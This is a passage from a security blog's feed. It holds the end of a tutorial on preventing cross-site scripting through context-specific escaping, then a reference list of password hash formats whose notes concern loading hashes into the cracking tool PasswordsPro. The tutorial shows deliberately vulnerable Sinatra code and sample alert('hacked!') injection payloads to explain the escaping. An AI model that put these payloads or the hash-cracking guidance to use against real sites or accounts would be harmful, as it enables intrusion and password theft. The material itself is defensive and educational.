&lt;p&gt;Unfortunately, there is no single tool or algorithm to do this, due to the variety of contexts in which one could insert user input, and the different requirements each of those contexts have for properly escaping text. Typically, however, modern web programming frameworks have libraries devoted to escaping user input in a variety of contexts. I recommend strictly using those libraries and not implementing your own. If you’re curious about how these libraries work, in the following sections I discuss the most common contexts in which you would want to insert user input, and the proper ways to use escaping to prevent XSS.  &lt;/p&gt;
&lt;h3 id=&quot;Between-Opening-and-Closing-HTML-Content-Tag&quot;&gt;&lt;a href=&quot;#Between-Opening-and-Closing-HTML-Content-Tag&quot; class=&quot;headerlink&quot; title=&quot;Between Opening and Closing HTML Content Tag&quot;&gt;&lt;/a&gt;Between Opening and Closing HTML Content Tag&lt;/h3&gt;&lt;p&gt;Inside standard content elements is the safest place to insert user input. HTML content elements include tags such as &lt;code&gt;&amp;lt;p&amp;gt;&lt;/code&gt;, &lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt;, and &lt;code&gt;&amp;lt;li&amp;gt;&lt;/code&gt;, essentially any element meant to contain other content elements or plain text. In this case, we want to use HTML escaping to ensure user input is never mistaken for an HTML tag or attribute. This means that we have to convert certain dangerous characters into the form &lt;code&gt;&amp;amp;X&lt;/code&gt;;, where X is either a number (preceded by a &lt;code&gt;#&lt;/code&gt;) or, in certain cases, a name. These constructs are called HTML entities, and they tell the HTML parser that they should be interpreted and displayed as text, and never treated as HTML tags. Below is a complete list of the characters that need to be escaped.  &lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dangerous Character&lt;/th&gt;
&lt;th&gt;Named HTML Entity&lt;/th&gt;
&lt;th&gt;Numerical HTML Entity (in hex)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&amp;amp;&lt;/td&gt;
&lt;td&gt;\&amp;amp;&lt;/td&gt;
&lt;td&gt;\&amp;#38;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&amp;lt;&lt;/td&gt;
&lt;td&gt;\&amp;lt;&lt;/td&gt;
&lt;td&gt;\&amp;#60;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&amp;gt;&lt;/td&gt;
&lt;td&gt;\&amp;gt;&lt;/td&gt;
&lt;td&gt;\&amp;#62;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;“&lt;/td&gt;
&lt;td&gt;\&amp;quot;&lt;/td&gt;
&lt;td&gt;\&amp;#34;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;‘&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;\&amp;#39;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;In our search engine example above, we wanted to place user input inside of &lt;/p&gt;&lt;p&gt; tags, even if the input is an attempt at XSS. This can safely be accomplished by using the HTML escaping technique. The raw HTML with proper escaping looks like this:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;...&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;lt;p&amp;gt;Here are the results found for: &amp;amp;lt;script&amp;amp;gt;alert(&amp;amp;#39;hacked!&amp;amp;#39;);&amp;amp;lt;/script&amp;amp;gt;&amp;lt;/p&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;...&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;h3 id=&quot;HTML-Attribute-Values&quot;&gt;&lt;a href=&quot;#HTML-Attribute-Values&quot; class=&quot;headerlink&quot; title=&quot;HTML Attribute Values&quot;&gt;&lt;/a&gt;HTML Attribute Values&lt;/h3&gt;&lt;p&gt;While it is possible to allow user input in HTML tag attributes, it is significantly more dangerous than allowing user input between content tags. Because HTML attribute values don’t have to be quoted, there are many more ways for attackers to escape out of them and inject malicious code. In the following contrived example, we construct a page uses a get parameter to set the width of an image.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;8&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;require &amp;apos;sinatra&amp;apos;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;get &amp;apos;/image&amp;apos; do&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;  html = &amp;quot;&amp;quot;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;  # ...&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;  html += &amp;quot;&amp;lt;img src=image.jpg height=300 width=#&amp;#123;params[:w]&amp;#125;&amp;gt;&amp;quot;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;  # ...&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;  return html&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;end&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Here, if an attacker constructs the URL &lt;code&gt;http://example.com/image?w=400%20onload=alert(&amp;#39;hacked!&amp;#39;)&lt;/code&gt;, the resulting HTML will cause the malicious Javascript to run with the image is loaded.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;...&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;lt;img src=image.jpg height=300 width=400 onload=alert(&amp;apos;hacked!&amp;apos;)&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;...&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;To ensure safety, we have to escape all non-alphanumeric characters in the user input using HTML entities, not just the five characters listed in the previous table. A complete list HTML entities can be found &lt;a href=&quot;http://dev.w3.org/html5/html-author/charref&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;here&lt;/a&gt;. In the above example, properly escaped user input would look like this:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;...&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;lt;img src=image.jpg height=300 width=400&amp;amp;#32;onload&amp;amp;#61;alert&amp;amp;#40;&amp;amp;#39;hacked&amp;amp;#33;&amp;amp;#39;&amp;amp;#41;&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;...&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;h3 id=&quot;JSON-String-Values&quot;&gt;&lt;a href=&quot;#JSON-String-Values&quot; class=&quot;headerlink&quot; title=&quot;JSON String Values&quot;&gt;&lt;/a&gt;JSON String Values&lt;/h3&gt;&lt;p&gt;If you want to allow user input to be embedded in your JavaScript code, the only safe place is inside of a quoted string, either as a regular string variable or within a JSON string value. Even here, it is still dangerous to allow user input to be inserted unescaped, as the example below illustrates.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&amp;lt;script&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;var string = &amp;quot;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(&amp;apos;hacked!&amp;apos;);&amp;quot;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Even though the red  is inside of a Javascript string, it closes the Javascript context and starts a new one. This is because browsers have their HTML parsers run before the Javascript parsers, so HTML elements get highest priority. Even my text editor gets this wrong.&lt;br&gt;The best solution here is to escape every non-alphanumeric character using unicode escaping. The following table has some examples.    &lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dangerous Character&lt;/th&gt;
&lt;th&gt;Unicode escape&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&amp;lt;&lt;/td&gt;
&lt;td&gt;\u003C&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&amp;gt;&lt;/td&gt;
&lt;td&gt;\u003E&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;“&lt;/td&gt;
&lt;td&gt;\u0022&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;There are other dangerous places to allow user input to be inserted, such as CSS property values and URL get parameters, but the solutions for all of them are the same: always escape user input in every context. Rather than trying to remember all of the escaping rules for each context, it’s much safer to use a library for the job. Read the documentation of your favorite web framework and use its built-in tools to ensure you don’t make any mistakes.  &lt;/p&gt;
&lt;p&gt;As you’ve seen in the examples above, it is all too easy to expose your site to XSS, and these types of vulnerabilities can be incredibly hard to detect for even trained human eyes. As an added level of security, I highly recommend using an automated tool to scan for and detect XSS vulnerabilities in your site. Tinfoil provides the best web application security solution on the market, and it detects XSS vulnerabilities on your website along with many other types of web vulnerabilities.  &lt;/p&gt;
&lt;h2 id=&quot;Reference&quot;&gt;&lt;a href=&quot;#Reference&quot; class=&quot;headerlink&quot; title=&quot;Reference&quot;&gt;&lt;/a&gt;Reference&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.tinfoilsecurity.com/blog/what-is-cross-site-scripting-xss&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;Cross-Site Scripting (XSS) in Plain English&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;br&gt;&lt;/p&gt;
</content>

    <summary type="html">

      &lt;h2 id=&quot;Preface&quot;&gt;&lt;a href=&quot;#Preface&quot; class=&quot;headerlink&quot; title=&quot;Preface&quot;&gt;&lt;/a&gt;Preface&lt;/h2&gt;&lt;p&gt;Welcome to my weekly series where I explain differ

    </summary>

      <category term="B-XSS" scheme="http://sec.php101.cn/categories/B-XSS/"/>


  </entry>

  <entry>
    <title>Ultimate Hash Types</title>
    <link href="http://sec.php101.cn/2014/12/03/hash-types/"/>
    <id>http://sec.php101.cn/2014/12/03/hash-types/</id>
    <published>2014-12-02T17:24:50.000Z</published>
    <updated>2016-03-17T08:46:29.000Z</updated>

    <content type="html">&lt;h2 id=&quot;DES-Unix&quot;&gt;&lt;a href=&quot;#DES-Unix&quot; class=&quot;headerlink&quot; title=&quot;DES(Unix)&quot;&gt;&lt;/a&gt;DES(Unix)&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: IvS7aeT4NzQPM&lt;/li&gt;
&lt;li&gt;Used in Linux and other similar OS.&lt;/li&gt;
&lt;li&gt;Length: 13 characters.&lt;/li&gt;
&lt;li&gt;Description: The first two characters are the salt (random characters; in our  example the salt is the string “Iv”), then there follows the actual hash.&lt;/li&gt;
&lt;li&gt;Notes: [1] [2]&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;Domain-Cached-Credentials&quot;&gt;&lt;a href=&quot;#Domain-Cached-Credentials&quot; class=&quot;headerlink&quot; title=&quot;Domain Cached Credentials&quot;&gt;&lt;/a&gt;Domain Cached Credentials&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: Admin:b474d48cdfc4974d86ef4d24904cdd91&lt;/li&gt;
&lt;li&gt;Used for caching passwords of Windows domain.&lt;/li&gt;
&lt;li&gt;Length: 16 bytes.&lt;/li&gt;
&lt;li&gt;Algorithm: MD4(MD4(Unicode($pass)).Unicode(strtolower($username)))&lt;/li&gt;
&lt;li&gt;Note: [1]&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;MD5-Unix&quot;&gt;&lt;a href=&quot;#MD5-Unix&quot; class=&quot;headerlink&quot; title=&quot;MD5(Unix)&quot;&gt;&lt;/a&gt;MD5(Unix)&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: $1$12345678$XM4P3PrKBgKNnTaqG9P0T/&lt;/li&gt;
&lt;li&gt;Used in Linux and other similar OS.&lt;/li&gt;
&lt;li&gt;Length: 34 characters.&lt;/li&gt;
&lt;li&gt;Description: The hash begins with the $1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string “12345678”), then there goes one more $ character, followed by the actual hash.&lt;/li&gt;
&lt;li&gt;Algorithm: Actually that is a loop calling the MD5 algorithm 2000 times.&lt;/li&gt;
&lt;li&gt;Notes: [1] [2]&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;MD5-APR&quot;&gt;&lt;a href=&quot;#MD5-APR&quot; class=&quot;headerlink&quot; title=&quot;MD5(APR)&quot;&gt;&lt;/a&gt;MD5(APR)&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: $apr1$12345678$auQSX8Mvzt.tdBi4y6Xgj.&lt;/li&gt;
&lt;li&gt;Used in Linux and other similar OS.&lt;/li&gt;
&lt;li&gt;Length: 37 characters.&lt;/li&gt;
&lt;li&gt;Description: The hash begins with the $apr1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string “12345678”), then there goes one more $ character, followed by the actual hash.&lt;/li&gt;
&lt;li&gt;Algorithm: Actually that is a loop calling the MD5 algorithm 2000 times.&lt;/li&gt;
&lt;li&gt;Notes: [1] [2]&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;MD5-phpBB3&quot;&gt;&lt;a href=&quot;#MD5-phpBB3&quot; class=&quot;headerlink&quot; title=&quot;MD5(phpBB3)&quot;&gt;&lt;/a&gt;MD5(phpBB3)&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: $H$9123456785DAERgALpsri.D9z3ht120&lt;/li&gt;
&lt;li&gt;Used in phpBB 3.x.x.&lt;/li&gt;
&lt;li&gt;Length: 34 characters.&lt;/li&gt;
&lt;li&gt;Description: The hash begins with the $H$ signature, then there goes one character (most often the number ‘9’), then there goes the salt (8 random characters; in our example the salt is the string “12345678”), followed by the actual hash.&lt;/li&gt;
&lt;li&gt;Algorithm: Actually that is a loop calling the MD5 algorithm 2048 times.&lt;/li&gt;
&lt;li&gt;Notes: [1] [2]&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;MD5-Wordpress&quot;&gt;&lt;a href=&quot;#MD5-Wordpress&quot; class=&quot;headerlink&quot; title=&quot;MD5(Wordpress)&quot;&gt;&lt;/a&gt;MD5(Wordpress)&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: $P$B123456780BhGFYSlUqGyE6ErKErL01&lt;/li&gt;
&lt;li&gt;Used in Wordpress.&lt;/li&gt;
&lt;li&gt;Length: 34 characters.&lt;/li&gt;
&lt;li&gt;Description: The hash begins with the $P$ signature, then there goes one character (most often the number ‘B’), then there goes the salt (8 random characters; in our example the salt is the string “12345678”), followed by the actual hash.&lt;/li&gt;
&lt;li&gt;Algorithm: Actually that is a loop calling the MD5 algorithm 8192 times.&lt;/li&gt;
&lt;li&gt;Notes: [1] [2]&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;MySQL&quot;&gt;&lt;a href=&quot;#MySQL&quot; class=&quot;headerlink&quot; title=&quot;MySQL&quot;&gt;&lt;/a&gt;MySQL&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: 606717496665bcba&lt;/li&gt;
&lt;li&gt;Used in the old versions of MySQL.&lt;/li&gt;
&lt;li&gt;Length: 8 bytes.&lt;/li&gt;
&lt;li&gt;Description: The hash consists of two DWORDs, each not exceeding the value of 0x7fffffff.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;MySQL5&quot;&gt;&lt;a href=&quot;#MySQL5&quot; class=&quot;headerlink&quot; title=&quot;MySQL5&quot;&gt;&lt;/a&gt;MySQL5&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: *E6CC90B878B948C35E92B003C792C46C58C4AF40&lt;/li&gt;
&lt;li&gt;Used in the new versions of MySQL.&lt;/li&gt;
&lt;li&gt;Length: 20 bytes.&lt;/li&gt;
&lt;li&gt;Algorithm: SHA-1(SHA-1($pass))&lt;/li&gt;
&lt;li&gt;Note: The hashes are to be loaded to the program without the asterisk that stands in the beginning of each hash.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;RAdmin-v2-x&quot;&gt;&lt;a href=&quot;#RAdmin-v2-x&quot; class=&quot;headerlink&quot; title=&quot;RAdmin v2.x&quot;&gt;&lt;/a&gt;RAdmin v2.x&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: 5e32cceaafed5cc80866737dfb212d7f&lt;/li&gt;
&lt;li&gt;Used in the application Remote Administrator v2.x.&lt;/li&gt;
&lt;li&gt;Length: 16 bytes.&lt;/li&gt;
&lt;li&gt;Algorithm: The password is padded with zeros to the length of 100 bytes, then that * entire string is hashed with the MD5 algorithm.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;MD5&quot;&gt;&lt;a href=&quot;#MD5&quot; class=&quot;headerlink&quot; title=&quot;MD5&quot;&gt;&lt;/a&gt;MD5&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: c4ca4238a0b923820dcc509a6f75849b&lt;/li&gt;
&lt;li&gt;Used in phpBB v2.x, Joomla version below 1.0.13 and many other forums and CMS.&lt;/li&gt;
&lt;li&gt;Length: 16 bytes.&lt;/li&gt;
&lt;li&gt;Algorithm: Same as the md5() function in PHP.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;md5-pass-salt&quot;&gt;&lt;a href=&quot;#md5-pass-salt&quot; class=&quot;headerlink&quot; title=&quot;md5($pass.$salt)&quot;&gt;&lt;/a&gt;md5($pass.$salt)&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: 6f04f0d75f6870858bae14ac0b6d9f73:1234&lt;/li&gt;
&lt;li&gt;Used in WB News, Joomla version 1.0.13 and higher.&lt;/li&gt;
&lt;li&gt;Length: 16 bytes.&lt;/li&gt;
&lt;li&gt;Note: [1]&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;md5-salt-pass&quot;&gt;&lt;a href=&quot;#md5-salt-pass&quot; class=&quot;headerlink&quot; title=&quot;md5($salt.$pass)&quot;&gt;&lt;/a&gt;md5($salt.$pass)&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: f190ce9ac8445d249747cab7be43f7d5:12&lt;/li&gt;
&lt;li&gt;Used in osCommerce, AEF, Gallery and other CMS.&lt;/li&gt;
&lt;li&gt;Length: 16 bytes.&lt;/li&gt;
&lt;li&gt;Note: [1]&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;md5-md5-pass&quot;&gt;&lt;a href=&quot;#md5-md5-pass&quot; class=&quot;headerlink&quot; title=&quot;md5(md5($pass))&quot;&gt;&lt;/a&gt;md5(md5($pass))&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: 28c8edde3d61a0411511d3b1866f0636&lt;/li&gt;
&lt;li&gt;Used in e107, DLE, AVE, Diferior, Koobi and other CMS.&lt;/li&gt;
&lt;li&gt;Length: 16 bytes.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;md5-md5-pass-salt&quot;&gt;&lt;a href=&quot;#md5-md5-pass-salt&quot; class=&quot;headerlink&quot; title=&quot;md5(md5($pass).$salt)&quot;&gt;&lt;/a&gt;md5(md5($pass).$salt)&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: 6011527690eddca23580955c216b1fd2:wQ6&lt;/li&gt;
&lt;li&gt;Used in vBulletin, IceBB.&lt;/li&gt;
&lt;li&gt;Length: 16 bytes.&lt;/li&gt;
&lt;li&gt;Notes: [1] [3] [4]&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;md5-md5-salt-md5-pass&quot;&gt;&lt;a href=&quot;#md5-md5-salt-md5-pass&quot; class=&quot;headerlink&quot; title=&quot;md5(md5($salt).md5($pass))&quot;&gt;&lt;/a&gt;md5(md5($salt).md5($pass))&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: 81f87275dd805aa018df8befe09fe9f8:wH6_S&lt;/li&gt;
&lt;li&gt;Used in IPB.&lt;/li&gt;
&lt;li&gt;Length: 16 bytes.&lt;/li&gt;
&lt;li&gt;Notes: [1] [3]&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;md5-md5-salt-pass&quot;&gt;&lt;a href=&quot;#md5-md5-salt-pass&quot; class=&quot;headerlink&quot; title=&quot;md5(md5($salt).$pass)&quot;&gt;&lt;/a&gt;md5(md5($salt).$pass)&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: 816a14db44578f516cbaef25bd8d8296:1234&lt;/li&gt;
&lt;li&gt;Used in MyBB.&lt;/li&gt;
&lt;li&gt;Length: 16 bytes.&lt;/li&gt;
&lt;li&gt;Note: [1]&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;md5-salt-pass-salt&quot;&gt;&lt;a href=&quot;#md5-salt-pass-salt&quot; class=&quot;headerlink&quot; title=&quot;md5($salt.$pass.$salt)&quot;&gt;&lt;/a&gt;md5($salt.$pass.$salt)&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: a3bc9e11fddf4fef4deea11e33668eab:1234&lt;/li&gt;
&lt;li&gt;Used in TBDev.&lt;/li&gt;
&lt;li&gt;Length: 16 bytes.&lt;/li&gt;
&lt;li&gt;Note: [1]&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;md5-salt-md5-salt-pass&quot;&gt;&lt;a href=&quot;#md5-salt-md5-salt-pass&quot; class=&quot;headerlink&quot; title=&quot;md5($salt.md5($salt.$pass))&quot;&gt;&lt;/a&gt;md5($salt.md5($salt.$pass))&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: 1d715e52285e5a6b546e442792652c8a:1234&lt;/li&gt;
&lt;li&gt;Used in DLP.&lt;/li&gt;
&lt;li&gt;Length: 16 bytes.&lt;/li&gt;
&lt;li&gt;Note: [1]&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;SHA-1&quot;&gt;&lt;a href=&quot;#SHA-1&quot; class=&quot;headerlink&quot; title=&quot;SHA-1&quot;&gt;&lt;/a&gt;SHA-1&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: 356a192b7913b04c54574d18c28d46e6395428ab&lt;/li&gt;
&lt;li&gt;Used in many forums and CMS.&lt;/li&gt;
&lt;li&gt;Length: 20 bytes.&lt;/li&gt;
&lt;li&gt;Algorithm: Same as the sha1() function in PHP.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;sha1-strtolower-username-pass&quot;&gt;&lt;a href=&quot;#sha1-strtolower-username-pass&quot; class=&quot;headerlink&quot; title=&quot;sha1(strtolower($username).$pass)&quot;&gt;&lt;/a&gt;sha1(strtolower($username).$pass)&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: Admin:6c7ca345f63f835cb353ff15bd6c5e052ec08e7a&lt;/li&gt;
&lt;li&gt;Used in SMF.&lt;/li&gt;
&lt;li&gt;Length: 20 bytes.&lt;/li&gt;
&lt;li&gt;Note: [1]&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;sha1-salt-sha1-salt-sha1-pass&quot;&gt;&lt;a href=&quot;#sha1-salt-sha1-salt-sha1-pass&quot; class=&quot;headerlink&quot; title=&quot;sha1($salt.sha1($salt.sha1($pass)))&quot;&gt;&lt;/a&gt;sha1($salt.sha1($salt.sha1($pass)))&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: cd37bfbf68d198d11d39a67158c0c9cddf34573b:1234&lt;/li&gt;
&lt;li&gt;Used in Woltlab BB.&lt;/li&gt;
&lt;li&gt;Length: 20 bytes.&lt;/li&gt;
&lt;li&gt;Note: [1]&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;SHA-256-Unix&quot;&gt;&lt;a href=&quot;#SHA-256-Unix&quot; class=&quot;headerlink&quot; title=&quot;SHA-256(Unix)&quot;&gt;&lt;/a&gt;SHA-256(Unix)&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi&lt;/li&gt;
&lt;li&gt;Used in Linux and other similar OS.&lt;/li&gt;
&lt;li&gt;Length: 55 characters.&lt;/li&gt;
&lt;li&gt;Description: The hash begins with the $5$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string “12345678”), then there goes one more $ character, followed by the actual hash.&lt;/li&gt;
&lt;li&gt;Algorithm: Actually that is a loop calling the SHA-256 algorithm 5000 times.&lt;/li&gt;
&lt;li&gt;Notes: [1] [2]&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;SHA-512-Unix&quot;&gt;&lt;a href=&quot;#SHA-512-Unix&quot; class=&quot;headerlink&quot; title=&quot;SHA-512(Unix)&quot;&gt;&lt;/a&gt;SHA-512(Unix)&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Example: $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm&lt;/li&gt;
&lt;li&gt;Used in Linux and other similar OS.&lt;/li&gt;
&lt;li&gt;Length: 98 characters.&lt;/li&gt;
&lt;li&gt;Description: The hash begins with the $6$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string “12345678”), then there goes one more $ character, followed by the actual hash.&lt;/li&gt;
&lt;li&gt;Algorithm: Actually that is a loop calling the SHA-512 algorithm 5000 times.&lt;/li&gt;
&lt;li&gt;Notes: [1] [2]&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;p&gt;Notes:&lt;/p&gt;
&lt;p&gt;[1] Since the hashing requires not only a password but also a salt (or a user name), which is unique for each user, the attack speed for such hashes will decline proportionally to their count (for example, attacking 100 hashes will go 100 times slower than attacking one hash).&lt;/p&gt;
&lt;p&gt;[2] The hash is to be loaded to the program in full, to the “Hash” column - the program will automatically extract the salt and other required data from it.&lt;/p&gt;
&lt;p&gt;[3] The ‘:’ character can be used as salt; however, since it is used by default for separating hash and salt in PasswordsPro, it is recommended that you use a different character for separating fields; e.g., space.&lt;/p&gt;
&lt;p&gt;[4] Salt can contain special characters - single or double quotes, as well as backslash, which are preceded (after obtaining dumps from MySQL databases) by an additional backslash, which is to be removed manually. For example, the salt to be loaded to the program would be a’4 instead of a\’4, as well as the salts a”4 instead of a\”4 and a\4 instead of a\4.&lt;/p&gt;
</content>

    <summary type="html">

